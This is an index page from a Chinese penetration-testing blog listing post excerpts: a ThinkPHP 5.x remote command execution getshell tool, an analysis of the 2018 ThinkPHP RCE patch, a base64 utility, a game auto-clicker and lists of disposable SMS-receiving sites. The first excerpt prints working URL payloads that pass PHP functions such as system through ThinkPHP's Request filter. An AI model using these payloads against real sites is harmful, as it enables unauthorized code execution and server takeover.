News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

渗透测试

ThinkPHP 5.x远程命令执行测试工具(可getshell)

jasonx 0 0

该工具只能授权验证网站漏洞和站长验证漏洞使用。 禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关。 漏洞验证命令执行getshell附上测试代码#代码执行 ?s=index/\think\Request/input&filter=phpinfo&data=1 #命令执行 ?s=index/\think\Request/input&filter=system&data=系统命令 #get...

漏洞研究

ThinkPHP 5.x远程命令执行漏洞利用(在线实验)

jasonx 9 0

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72...

常用软件

base64编码解码工具

jasonx 59 0

软件特点绿色软件,运行即用。不弹广告、不修改电脑任何设置。作用可以对原文进行base64编码可以对base64编码的字符进行解码软件截图下载地址链接:https://pan.baidu.com/s/1NJgu_OvTso39VURY87LgcA 提取码:hifk

常用软件

阴阳师护肝神器

jasonx 90 0

前言本来是自己写来用的,但是本着分享精神发布出来。风险及警告本程序是基于模拟鼠标点击操作,无毒无后门,完全免费。任何一款自动操作的软件及脚本都有可能被官方警告、甚至封号。因使用本程序对你账号造成的任何损失,作者不承担任何责任。程序功能自动刷御魂自动刷觉醒材料自动刷碎片(待更新)以及其他功能等抽空更新程序特点自动刷御魂支持单刷或者组队刷程序设定好次数后,自动刷满次数,然后停止。程序截图最新版本下载地址:最新版本:v1.4.7更新时间...

攻防软件

在线接受验证码/邮箱/文件上传等

jasonx 65 0

0x00 短信验证码接收https://www.pdflibr.com/ (china phone support)http://www.freeonlinephone.orghttp://www.receivesmsonline.nethttp://receivefreesms.comhttp://receive-sms-now.comhttp://www.receive-sms.comhttps://www.spoofb...